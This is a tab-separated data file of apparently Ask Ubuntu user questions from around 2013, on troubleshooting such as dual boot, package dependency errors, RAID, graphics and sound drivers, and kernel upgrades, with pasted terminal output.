349043	ubuntu one does n't share some of my directories	i have ubuntu one installed in my ubuntu 13.04 laptop and inside a windows7 virtual machine . the main ubuntu one directory is in sync , this is ok . i use this win7 virtual machine only to use my desktop scanner . this vm collects all my scans inside a directory ... /scans . i have configured ubuntu one inside the windows 7 virtual machine to sync this ... /scans directory too - i have checked the sync locally checkbox associated with this folder . it seems to work , synchronizing has been under processing , and the size allocated on the ubuntu cloud drive has grown up slowly , percent by percent . now it shows `` files sync is up to date '' . so i should say the ubuntu one service is working . my problem : if i check the ubuntu one directory inside my linux ubuntu 13.04 laptop , the sync folder and its data wo n't appear ? what should i do so as my linux ubuntu 13.04 has access to this scans/ directory that is in sync with my win7 ?
349046	program not running properly when run in terminal	i am running c++ programs using the gnome terminal emulator in ubuntu 10.04 . the program has a number of steps and i get the program to print something to terminal after every one to tell me how far it 's got . at the end it then prints to file . i often have the following two problems : the program freezes when i click on somewhere other than the terminal or minimize it . this is evident by the fact that it stops printing to screen . the program can be easily unfrozen by simply double-clicking on the terminal . the terminal goes blank , displaying nothing but the cursor . this flickers , probably when something new is supposed to be printed to screen . the program seems to still be running , since it prints to file at the end . but sometimes the results it prints make no sense . has anyone seen anything like this before , and know what kind of issues cause it ?
349049	unable to boot win8 after ubuntu install	after installing ubuntu i am unable to start windows 8 . the bootsummary is on pastebin : http : //paste.ubuntu.com/6145218/ what could be the solution to fix these errors ? thank you !
349054	package dependencies can not be resolved help	this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time . the following packages have unmet dependencies : steam-launcher : depends : curl but it is not going to be installed depends : libc6 ( > = 2.15 ) but 2.15-0ubuntu10.4 is to be installed how do i get these ? because with out them i ca n't run steam
349055	where is `` users and groups '' in ubuntu 13.04 ?	previous versions of ubuntu allowed one to select system > administration > users and groups . what replaces this feature in version 13.04 ?
349056	ubuntu font still stuck in wingdings	hello ubuntu communtiy , we are still stuck in the webdings font . if anyone would check out the pastebin and see what was downloaded form the usb and can provide any suggestions how to change back to a normal reading layout it would be greatly appreciated .
349057	dash does not show applications available for installation	when i go to applications lens ( super+a ) , i can search for available applications and install them . from the general ( home ? ) lens , i can list only application that are actually installed , not those that are available . i vaguely remember application used to show up in the home lense and maybe i disabled it but i am not sure . or maybe this is the correct behaviour and my memory fails me ?
349058	what does the '| ' ( vertical bar ) character mean in a terminal command ?	example : in a terminal command xdpyinfo | grep resolution ( that i have taken from an answer ) , does the | character mean that the xdpyinfo output shall be sent to the grep program input for printing a line containing the resolution string ? where should i seek for such an information to avoid filling this forum by too simple questions ? thanks .
349060	broken packages and ca n't run -f install	after i installed codeblocks it started giving me error i 'm getting loads of errors . i 'm new to ubuntu ( from windows ) sudo dpkg -- configure -a dpkg : dependency problems prevent configuration of codeblocks-contrib : codeblocks-contrib depends on libwxsmithlib0 ( = 10.05-1 ) ; however : version of libwxsmithlib0 on system is 12.11-2. codeblocks-contrib depends on codeblocks ( = 10.05-1 ) ; however : version of codeblocks on system is 12.11-2. dpkg : error processing codeblocks-contrib ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libwxsmithlib0-dev : libwxsmithlib0-dev depends on libwxsmithlib-dev ( = 12.11-2 ) ; however : package libwxsmithlib-dev is not installed . dpkg : error processing libwxsmithlib0-dev ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : codeblocks-contrib libwxsmithlib0-dev when i use apt i get this error sudo apt-get install gimp reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : codeblocks-contrib : depends : libwxsmithlib0 ( = 10.05-1 ) but 12.11-2 is to be installed depends : codeblocks ( = 10.05-1 ) but 12.11-2 is to be installed codeblocks-dev : depends : libcodeblocks0 ( = 10.05-1 ) but 12.11-2 is to be installed gimp : depends : libgimp2.0 ( > = 2.8.4 ) but it is not going to be installed depends : libgimp2.0 ( < = 2.8.4-z ) but it is not going to be installed depends : gimp-data ( > = 2.8.4 ) but it is not going to be installed depends : gimp-data ( < = 2.8.4-z ) but it is not going to be installed depends : libbabl-0.1-0 ( > = 0.1.10 ) but it is not going to be installed depends : libgegl-0.2-0 ( > = 0.2.0 ) but it is not going to be installed depends : libwebkitgtk-1.0-0 ( > = 1.3.10 ) but it is not going to be installed libwxsmithlib0-dev : depends : libwxsmithlib-dev ( = 12.11-2 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . -f is n't working either apt-get -f install e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ? sahil @ sahil-ch : ~ $ sudo -s root @ sahil-ch : ~ # sudo dpkg -- configure -a dpkg : dependency problems prevent configuration of codeblocks-contrib : codeblocks-contrib depends on libwxsmithlib0 ( = 10.05-1 ) ; however : version of libwxsmithlib0 on system is 12.11-2. codeblocks-contrib depends on codeblocks ( = 10.05-1 ) ; however : version of codeblocks on system is 12.11-2. dpkg : error processing codeblocks-contrib ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libwxsmithlib0-dev : libwxsmithlib0-dev depends on libwxsmithlib-dev ( = 12.11-2 ) ; however : package libwxsmithlib-dev is not installed . dpkg : error processing libwxsmithlib0-dev ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : codeblocks-contrib libwxsmithlib0-dev and when i use software center it shows this error new software ca n't be installed , because there is a problem with software currently installed . do you want to repair this problem now ? and on prompting this error is shown installarchives ( ) failed : perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 162153 files and directories currently installed . ) preparing to replace codeblocks-contrib 10.05-1 ( using ... /codeblocks-contrib_12.11-2_i386.deb ) ... unpacking replacement codeblocks-contrib ... dpkg : error processing /var/cache/apt/archives/codeblocks-contrib_12.11-2_i386.deb ( -- unpack ) : trying to overwrite '/usr/share/codeblocks/cb_koders.zip ' , which is also in package codeblocks-contrib-common 10.05-1 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) unpacking libwxsmithlib-dev ( from ... /libwxsmithlib-dev_12.11-2_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/libwxsmithlib-dev_12.11-2_i386.deb ( -- unpack ) : trying to overwrite '/usr/include/wxsmith/properties/wxsflagsproperty.h ' , which is also in package wxsmith-headers 10.05-1 preparing to replace codeblocks-dev 10.05-1 ( using ... /codeblocks-dev_12.11-2_i386.deb ) ... unpacking replacement codeblocks-dev ... dpkg : error processing /var/cache/apt/archives/codeblocks-dev_12.11-2_i386.deb ( -- unpack ) : trying to overwrite '/usr/include/codeblocks/filefilters.h ' , which is also in package codeblocks-headers 10.05-1 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/codeblocks-contrib_12.11-2_i386.deb /var/cache/apt/archives/libwxsmithlib-dev_12.11-2_i386.deb /var/cache/apt/archives/codeblocks-dev_12.11-2_i386.deb dpkg : dependency problems prevent configuration of codeblocks-contrib : codeblocks-contrib depends on libwxsmithlib0 ( = 10.05-1 ) ; however : version of libwxsmithlib0 on system is 12.11-2. codeblocks-contrib depends on codeblocks ( = 10.05-1 ) ; however : version of codeblocks on system is 12.11-2. dpkg : error processing codeblocks-contrib ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libwxsmithlib0-dev : libwxsmithlib0-dev depends on libwxsmithlib-dev ( = 12.11-2 ) ; however : package libwxsmithlib-dev is not installed . dpkg : error processing libwxsmithlib0-dev ( -- configure ) : dependency problems - leaving unconfigured thank you : - )
349061	ubuntu server dns/dhcp/maas woes	i 've been using ubuntu server raring for a few weeks now . it seems to be great , but i havre a slight problem . i opted for the metal as a service option , and now its changing my dns records and going crazy with my dhcp config files . i made these config files using mint , with isc-dhcp-server and bind9 . i 've now sort of managed to get it up and runninfg , but i dont like all the additional entries it makes in the dns database files , and also , it 's just a grudgy system , it does n't always work .
349070	after installing xfce desktop it changed my original theme/screen	i have ubuntu 12.04 lts and recently i installed gnome and xfce desktop environment . now i have the problem that every time i start up or shutdown ubuntu i see numbers something about xfce , but i do not see the loading image below : my startup/shutdown screens are changed to xubuntu style ( i guess ) , and grub even says debian . i managed to solve the grub problem by running this from the command line : sudo apt-get remove desktop-base but how can i bring back the original ubuntu 12.04 startup and shutdown theme ? i tried this here and set it to lightdm but it did not resolve my problem . i removed xubuntu ( xfce ) like here described . but i still don't see the default ubuntu startup and shutdown screen . any more suggestions ? i also tried this here , now it is better but it is still not the original loading image . also the resolution is bad . the letters are too big .
349071	run different java based on command line parameter	i have multiple java installations on my machine and need to use different versions all the time . i have found that the currently used jvm can be changed by the commands update-alternatives and update-java-alternatives , which essentially change the link at /etc/alternatives/java etc . to point to the correct jvm installation . is it possible to run different versions of java by specifying a command line parameter ? e.g. , to run maven for example in the following ways : > java_home=/usr/lib/jvm/java-7-oracle/ mvn clean install > java_home=/usr/lib/jvm/java-6-sun/ mvn clean install edit : above commands work we can verify that the above commands work by running > java_home=/usr/lib/jvm/java-6-sun mvn -version apache maven 3.0.4 maven home : /usr/share/maven java version : 1.6.0_32 , vendor : sun microsystems inc. java home : /usr/lib/jvm/java-6-sun-1.6.0.32/jre the java version and home are correct in the example . edit : solution to the problem the original problem was caused by an interface named commondatasource changed in the jre 's rt.jar , which caused incompatibility between different jres . the solution was to add the java 6 's rt.jar to the classpath : java_home= $ java6_home maven_opts= '' -xbootclasspath/a : $ java6_home/jre/lib/rt.jar '' mvn clean install
349072	my flash dirve is write protected	my flash drive is write protected . how can i remove the write protected ? my flash drive brand is sandisk .
349075	do i need to install apache and php/java to develop web apps in ubuntu touch ?	in new ubuntu tablet do we install apache server and program web application by using php or java ?
349079	dual boot with windows 8 ( raid )	i know there are quite a lot of other posts like these , but i really read all of them and i still could n't solve my problem . i recently got a dell with a 1tb hdd disk and a 32gb ssd disk ( using raid ) installed with windows 8 and now i want to install ubuntu 13.04 in the hdd disk . the problem is that it seems that ubuntu can`t recognize the partitions on the drive . when i start ubuntu installation , no partitions are shown : http : //postimg.org/image/otkjg28ot/ and if i try to open gparted i get the following error : http : //postimg.org/image/q9w1y7blp/ and clicking in cancel , it recognizes the disk as an unallocated disk . any help would be really appreciated , thanks !
349082	ubuntu 13.04 sound problem	sound is not continuous i tried to install and then removing pulseaudio and alsa and it stopped working and the icon near date has disappeared . i do n't know what to do to restore the ubuntu original sound configuration of ubuntu and which solution apply to get work the sound device . here is my sound info : lspci -nn | grep audio 00:1b.0 audio device [ 0403 ] : intel corporation c600/x79 series chipset high definition audio controller [ 8086:1d20 ] ( rev 06 ) 02:00.1 audio device [ 0403 ] : nvidia corporation gk104 hdmi audio controller [ 10de:0e0a ] ( rev a1 ) edit : solution to restore the sound icon : how do i reinstall the sound icon / sound menu ?
349091	two usb drives as raid 1 array ?	can two drives connected via usb be configured as a two-disk raid 1 array ?
349095	struggling with windows installer in a sedatech pc	i just bought this pc : sedatech pc office and right away i am trying to install ubuntu 12.10 with the windows installer . everything goes fine until the end of installation step 5 . at that point the progress window disappears and nothing happens , nothing has been installed and all is almost exactly as it was just before double clicking on wubi.exe . i say `` almost exactly '' because in the partition where i ask ubuntu to be installed ( different than the windows 7 partition ) there is an ubuntu folder with a couple of files and folders , but nothing usable . needless to say , there is no dual boot when i reboot . i have repeated this again and again . any ideas ? thanks ! ant
349096	trying to compile opencv c++ code getting some reference error	do we have to give path for opencv in ubuntu 13.04.if so tell me that also ? this is code : # include `` opencv2/opencv.hpp '' # include `` opencv2/video/video.hpp '' # include `` opencv2/highgui/highgui.hpp '' # include `` opencv2/core/core.hpp '' # include `` list '' # include `` iostream '' using namespace cv ; using namespace std ; int main ( int argc , char** argv ) { mat image ; image = imread ( argv [ 1 ] , 1 ) ; if ( argc ! = 2 || ! image.data ) { std : :cout < < `` no image data \n '' ; return -1 ; } namedwindow ( `` display image '' , cv_window_autosize ) ; imshow ( `` display image '' , image ) ; waitkey ( 0 ) ; return 0 ; } this is the command to execute it i gave : g++ displayimage.cpp -o displayimage this is the o/p : /tmp/ccqfky9z.o : in function `main ' : displayimage.cpp : ( .text+0x75 ) : undefined reference to `cv : :imread ( std : :string const & , int ) ' displayimage.cpp : ( .text+0x11b ) : undefined reference to `cv : :namedwindow ( std : :string const & , int ) ' displayimage.cpp : ( .text+0x14c ) : undefined reference to `cv : :_inputarray : :_inputarray ( cv : :mat const & ) ' displayimage.cpp : ( .text+0x18c ) : undefined reference to `cv : :imshow ( std : :string const & , cv : :_inputarray const & ) ' displayimage.cpp : ( .text+0x1b4 ) : undefined reference to `cv : :waitkey ( int ) ' /tmp/ccqfky9z.o : in function `cv : :mat : :~mat ( ) ' : displayimage.cpp : ( .text._zn2cv3matd2ev [ _zn2cv3matd5ev ] +0x39 ) : undefined reference to `cv : :fastfree ( void* ) ' /tmp/ccqfky9z.o : in function `cv : :mat : :operator= ( cv : :mat const & ) ' : displayimage.cpp : ( .text._zn2cv3mataserks0_ [ _zn2cv3mataserks0_ ] +0x111 ) : undefined reference to `cv : :mat : :copysize ( cv : :mat const & ) ' /tmp/ccqfky9z.o : in function `cv : :mat : :release ( ) ' : displayimage.cpp : ( .text._zn2cv3mat7releaseev [ _zn2cv3mat7releaseev ] +0x47 ) : undefined reference to `cv : :mat : :deallocate ( ) ' collect2 : error : ld returned 1 exit status
349099	can i install ubuntu as a stand alone os	how would i install ubuntu on a new hard drive to stand alone . i have formatted an older 250gb hd and would like to set up the pc as a linux only device
349101	windows on ubuntu	can i install windows or windows based programs on an ubuntu based pc ? i am trying to transition from xp/7 and most of my business software is windows based .
349102	how to reconstruct raid-1 in ubuntu ?	there was raid-1 device created of two partitions of the similar size on two disks . disks are not of the same size and there are other ( non-raid ) partitions . during clean install of 13.04 , i have n't touched those two partition ( left them unformatted and assigned to anything ) and now have newly installed system with old ( non-raid ) partition regularly accessible . and i have those two partition which were part of raid-1 device and they are unreadable . i would like to create raid-1 using those two partitions . is it possible to do it , get functional raid-1 and gain back access to data stored there ?
349103	slow animations using ubuntu 13.04	i just decided to now swap from win to ubuntu . now after the install of the latest ubuntu ( 13.04 ) , the animations of the desktop ( just as open the dash-board ) are very laggy and slow . i searched around the internet , but nothing of the answers fits my problem , since my hardware is at least sufficient to render such animations . here my specs : amd athlon ii x4 640 xfx r7770 8gb ddr3 the hardware ca n't be the problem since it 's running well under windows . i also updated ubuntu to the current , and i 'm using the xorg radeon driver . i also tried to edit the xorg.config , but it seems that wo n't work for me ( i also read somewhere it 's not used anymore ? ! ) . and interesting fact is that ubuntu does n't detect my monitor ( medion ) and does only support 1024x768 and lower resolution . maybe i 'm to stupid to search for but i did n't come to a solution on my own . my question is , does someone knows how i could fix this laggy gui or at least know whats the source of my problem ? edit : sorry , forgot the output of sudo lspci -nnk | grep -a10 vga : 02:00.0 vga compatible controller [ 0300 ] : advanced micro devices [ amd ] nee ati cape verde xt [ radeon hd 7770 ghz edition ] [ 1002:683d ] subsystem : xfx pine group inc. device [ 1682:3232 ] kernel driver in use : radeon 02:00.1 audio device [ 0403 ] : advanced micro devices [ amd ] nee ati cape verde/pitcairn hdmi audio [ radeon hd 7700/7800 series ] [ 1002 : aab0 ] subsystem : xfx pine group inc. device [ 1682 : aab0 ] kernel driver in use : snd_hda_intel 03:06.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl-8185 ieee 802.11a/b/g wireless lan controller [ 10ec:8185 ] ( rev 20 ) subsystem : planex communications , inc device [ 14ea:8225 ] kernel driver in use : rtl8180
349104	change permissions for group and users	ok so i want my /var/www/ folder to only offer one user access to create and modify file ( apart from apache ) . at the moment this is happening but if i upload files from my ubuntu laptop and have my ftp user delete a file from my laptops upload i am denied access to those files and folders
349109	autohiding scroll bar button	i 'm not comfortable with autohiding auto-sliding scroll bar button in some gnome based applications ( like gedit ) . is there any way to restore a normal scroll bar ? similar to one in kde applications ( like kate ) or windows applications .
349111	kernel upgradation after effect	i am on 12.04.2 xubuntu and i just upgraded my kernel from 3.2 to 3.11 while still staying with my 12.04.2 version . i did it successfully but the terminal showing that i have some missing plug-ins . and here is what the terminal reads abc @ xyz-desktop : ~/downloads $ sudo dpkg -i linux-headers-3.11.1*.deb linux-image-3.11.1*.deb [ sudo ] password for abc : selecting previously unselected package linux-headers-3.11.1-031101 . ( reading database ... 183050 files and directories currently installed . ) unpacking linux-headers-3.11.1-031101 ( from linux-headers-3.11.1-031101_3.11.1-031101.201309141102_all.deb ) ... selecting previously unselected package linux-headers-3.11.1-031101-generic . unpacking linux-headers-3.11.1-031101-generic ( from linux-headers-3.11.1-031101-generic_3.11.1-031101.201309141102_i386.deb ) ... selecting previously unselected package linux-image-3.11.1-031101-generic . unpacking linux-image-3.11.1-031101-generic ( from linux-image-3.11.1-031101-generic_3.11.1-031101.201309141102_i386.deb ) ... done . setting up linux-headers-3.11.1-031101 ( 3.11.1-031101.201309141102 ) ... setting up linux-headers-3.11.1-031101-generic ( 3.11.1-031101.201309141102 ) ... setting up linux-image-3.11.1-031101-generic ( 3.11.1-031101.201309141102 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/apt-auto-removal 3.11.1-031101-generic /boot/vmlinuz-3.11.1-031101-generic run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.11.1-031101-generic /boot/vmlinuz-3.11.1-031101-generic update-initramfs : generating /boot/initrd.img-3.11.1-031101-generic w : possible missing firmware /lib/firmware/radeon/cypress_smc.bin for module radeon w : possible missing firmware /lib/firmware/radeon/juniper_smc.bin for module radeon w : possible missing firmware /lib/firmware/radeon/redwood_smc.bin for module radeon w : possible missing firmware /lib/firmware/radeon/cedar_smc.bin for module radeon w : possible missing firmware /lib/firmware/radeon/rv710_smc.bin for module radeon w : possible missing firmware /lib/firmware/radeon/rv740_smc.bin for module radeon w : possible missing firmware /lib/firmware/radeon/rv730_smc.bin for module radeon w : possible missing firmware /lib/firmware/radeon/rv770_smc.bin for module radeon w : possible missing firmware /lib/firmware/radeon/aruba_rlc.bin for module radeon w : possible missing firmware /lib/firmware/radeon/aruba_me.bin for module radeon w : possible missing firmware /lib/firmware/radeon/aruba_pfp.bin for module radeon w : possible missing firmware /lib/firmware/radeon/cayman_smc.bin for module radeon w : possible missing firmware /lib/firmware/radeon/caicos_smc.bin for module radeon w : possible missing firmware /lib/firmware/radeon/turks_smc.bin for module radeon w : possible missing firmware /lib/firmware/radeon/barts_smc.bin for module radeon w : possible missing firmware /lib/firmware/radeon/hainan_smc.bin for module radeon w : possible missing firmware /lib/firmware/radeon/hainan_rlc.bin for module radeon w : possible missing firmware /lib/firmware/radeon/hainan_mc.bin for module radeon w : possible missing firmware /lib/firmware/radeon/hainan_ce.bin for module radeon w : possible missing firmware /lib/firmware/radeon/hainan_me.bin for module radeon w : possible missing firmware /lib/firmware/radeon/hainan_pfp.bin for module radeon w : possible missing firmware /lib/firmware/radeon/oland_smc.bin for module radeon w : possible missing firmware /lib/firmware/radeon/oland_rlc.bin for module radeon w : possible missing firmware /lib/firmware/radeon/oland_mc.bin for module radeon w : possible missing firmware /lib/firmware/radeon/oland_ce.bin for module radeon w : possible missing firmware /lib/firmware/radeon/oland_me.bin for module radeon w : possible missing firmware /lib/firmware/radeon/oland_pfp.bin for module radeon w : possible missing firmware /lib/firmware/radeon/verde_smc.bin for module radeon w : possible missing firmware /lib/firmware/radeon/verde_rlc.bin for module radeon w : possible missing firmware /lib/firmware/radeon/verde_mc.bin for module radeon w : possible missing firmware /lib/firmware/radeon/verde_ce.bin for module radeon w : possible missing firmware /lib/firmware/radeon/verde_me.bin for module radeon w : possible missing firmware /lib/firmware/radeon/verde_pfp.bin for module radeon w : possible missing firmware /lib/firmware/radeon/pitcairn_smc.bin for module radeon w : possible missing firmware /lib/firmware/radeon/pitcairn_rlc.bin for module radeon w : possible missing firmware /lib/firmware/radeon/pitcairn_mc.bin for module radeon w : possible missing firmware /lib/firmware/radeon/pitcairn_ce.bin for module radeon w : possible missing firmware /lib/firmware/radeon/pitcairn_me.bin for module radeon w : possible missing firmware /lib/firmware/radeon/pitcairn_pfp.bin for module radeon w : possible missing firmware /lib/firmware/radeon/tahiti_smc.bin for module radeon w : possible missing firmware /lib/firmware/radeon/tahiti_rlc.bin for module radeon w : possible missing firmware /lib/firmware/radeon/tahiti_mc.bin for module radeon w : possible missing firmware /lib/firmware/radeon/tahiti_ce.bin for module radeon w : possible missing firmware /lib/firmware/radeon/tahiti_me.bin for module radeon w : possible missing firmware /lib/firmware/radeon/tahiti_pfp.bin for module radeon w : possible missing firmware /lib/firmware/radeon/bonaire_uvd.bin for module radeon w : possible missing firmware /lib/firmware/radeon/tahiti_uvd.bin for module radeon w : possible missing firmware /lib/firmware/radeon/sumo_uvd.bin for module radeon w : possible missing firmware /lib/firmware/radeon/cypress_uvd.bin for module radeon w : possible missing firmware /lib/firmware/radeon/rv710_uvd.bin for module radeon w : possible missing firmware /lib/firmware/radeon/kabini_sdma.bin for module radeon w : possible missing firmware /lib/firmware/radeon/kabini_rlc.bin for module radeon w : possible missing firmware /lib/firmware/radeon/kabini_mec.bin for module radeon w : possible missing firmware /lib/firmware/radeon/kabini_ce.bin for module radeon w : possible missing firmware /lib/firmware/radeon/kabini_me.bin for module radeon w : possible missing firmware /lib/firmware/radeon/kabini_pfp.bin for module radeon w : possible missing firmware /lib/firmware/radeon/kaveri_sdma.bin for module radeon w : possible missing firmware /lib/firmware/radeon/kaveri_rlc.bin for module radeon w : possible missing firmware /lib/firmware/radeon/kaveri_mec.bin for module radeon w : possible missing firmware /lib/firmware/radeon/kaveri_ce.bin for module radeon w : possible missing firmware /lib/firmware/radeon/kaveri_me.bin for module radeon w : possible missing firmware /lib/firmware/radeon/kaveri_pfp.bin for module radeon w : possible missing firmware /lib/firmware/radeon/bonaire_sdma.bin for module radeon w : possible missing firmware /lib/firmware/radeon/bonaire_rlc.bin for module radeon w : possible missing firmware /lib/firmware/radeon/bonaire_mc.bin for module radeon w : possible missing firmware /lib/firmware/radeon/bonaire_mec.bin for module radeon w : possible missing firmware /lib/firmware/radeon/bonaire_ce.bin for module radeon w : possible missing firmware /lib/firmware/radeon/bonaire_me.bin for module radeon w : possible missing firmware /lib/firmware/radeon/bonaire_pfp.bin for module radeon run-parts : executing /etc/kernel/postinst.d/pm-utils 3.11.1-031101-generic /boot/vmlinuz-3.11.1-031101-generic run-parts : executing /etc/kernel/postinst.d/update-notifier 3.11.1-031101-generic /boot/vmlinuz-3.11.1-031101-generic run-parts : executing /etc/kernel/postinst.d/zz-update-grub 3.11.1-031101-generic /boot/vmlinuz-3.11.1-031101-generic generating grub.cfg ... found linux image : /boot/vmlinuz-3.11.1-031101-generic found initrd image : /boot/initrd.img-3.11.1-031101-generic found linux image : /boot/vmlinuz-3.2.0-51-generic found initrd image : /boot/initrd.img-3.2.0-51-generic found linux image : /boot/vmlinuz-3.2.0-37-generic found initrd image : /boot/initrd.img-3.2.0-37-generic my kernel release is showing 3.11 now , but i get all those missing firmware warnings . please tell me how to fix this . thanks in advance !
349116	unable to detect usb tv tuner in ubuntu 12.04	i recently bought a tv usb tuner . but i am unable to make it detectable in my ubuntu 12.04 lts system . below are the details of the model . manufacturer : enter device : tv tuner usb e210e when checked in terminal lsusb i found difference by plugging in and out below id bus 002 device 011 : id 6000:0001 beholder international ltd. and by lsusb -v below is the output . bus 002 device 011 : id 6000:0001 beholder international ltd. could n't open device , some information will be missing device descriptor : blength 18 bdescriptortype 1 bcdusb 2.00 bdeviceclass 0 ( defined at interface level ) bdevicesubclass 0 bdeviceprotocol 0 bmaxpacketsize0 64 idvendor 0x6000 beholder international ltd. idproduct 0x0001 bcddevice 0.01 imanufacturer 16 iproduct 32 iserial 64 bnumconfigurations 1 configuration descriptor : blength 9 bdescriptortype 2 wtotallength 78 bnuminterfaces 1 bconfigurationvalue 1 iconfiguration 48 bmattributes 0x80 ( bus powered ) maxpower 500ma interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 0 bnumendpoints 2 binterfaceclass 255 vendor specific class binterfacesubclass 0 binterfaceprotocol 255 iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x81 ep 1 in bmattributes 1 transfer type isochronous synch type none usage type data wmaxpacketsize 0x0000 1x 0 bytes binterval 1 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x82 ep 2 in bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 0 interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 1 bnumendpoints 2 binterfaceclass 255 vendor specific class binterfacesubclass 0 binterfaceprotocol 255 iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x81 ep 1 in bmattributes 1 transfer type isochronous synch type none usage type data wmaxpacketsize 0x1400 3x 1024 bytes binterval 1 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x82 ep 2 in bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 0 interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 2 bnumendpoints 2 binterfaceclass 255 vendor specific class binterfacesubclass 0 binterfaceprotocol 255 iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x81 ep 1 in bmattributes 1 transfer type isochronous synch type none usage type data wmaxpacketsize 0x1400 3x 1024 bytes binterval 1 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x82 ep 2 in bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 0 can any one please help me to resolve this issue .
349121	performance issue when opening windows 7 ( 32bit ) in virtualbox of ubuntu 12.04 lts	i am using ubuntu 12.04 lts system with nearly 500gb hdd , 4gb ram . i installed windows 7 ( 32bit ) in virtualbox of my ubuntu . alloted 1.5 gb of ram to virtualbox . everything in ubuntu works fine untill i open windows 7 via virtualbox . can anyone please suggest me some to reduce my ram usage while running windows 7 and let my ubuntu system does n't get hanged hampering my work . with regards , chaitanya kumar k .
349123	error need help /boot/grub/x86_64-efi/normal.mod not found	i 'm really frustrated ! i bought me a new laptop a half year ago , with windows 8 pre-installed . then i installed ubuntu 13.04 as a dual boot , but after a short time of using my laptop , software-center could n't open ... so i wanted to reinstall ubuntu . i inserted the ubuntu dvd and used `` delete ubuntu and reinstall '' ( or something like that ) . when i now reinstalled , i needed to restart , which i did ... when i now restart , the laptop shows the asus logo , but then only appears a black screen with a white text that shows : error : '/boot/grub/x86_64-efi/normal.mod not found grub rescue > _ i already wanted to boot from the ubuntu dvd , but i does n't load the dvd ! what can i type in , to rescue , my data ? , i would also delete everything , but i still want to use my laptop ! please , i need help , please , i would be pleased for every answer !
349124	brightness minimum level turns backlight off	i have an acer aspire s3-391 ultrabook . it 's sandy bridge i3-2377m cpu with appropriate integrated graphics . 320gb hard drive with 20gb cache ssd . i have windows installed on the hard drive and ubuntu 13.04 installed on the ssd . now , the problem i am having is exactly as described in the title . when the brightness under /sys/class/backlight/acpi_video0/brightness is set at 0 , the backlight turns off . the screen is still powered and under camera flash , it 's visible - i.e . the system is still working . this is mostly a problem because the os defaults to the lowest brightness on boot , leaving me to blindly type my password in and later adjust the backlight . not horrible , i guess , but annoying enough to want to fix it . things i have tried : -installing intel drivers . they worked , but the backlight does n't respond to fn keys anymore and to get any backlight whatsoever i have to boot ubuntu normally from recovery mode . any tips on uninstalling this ? otherwise i was just going to reinstall ubuntu and start at the original issue . -using xbacklight . it does modify the backlight , as expected , but i ca n't set the minimum above 0 . -modifying the brightness setting under /sys/class/backlight/acpi_video0 . this is the correct path - the backlight attribute changes with brightness modifications . when doing a ls here , there seems to be a max brightness attribute , but no minimum . so basically , what i need to know : -how to uninstall the intel drivers , i.e . replace them with the ubuntu default for hd3000 integrated graphics ( is this the noveau i keep hearing about ? ) -how to restrict the system from entering a brightness level of 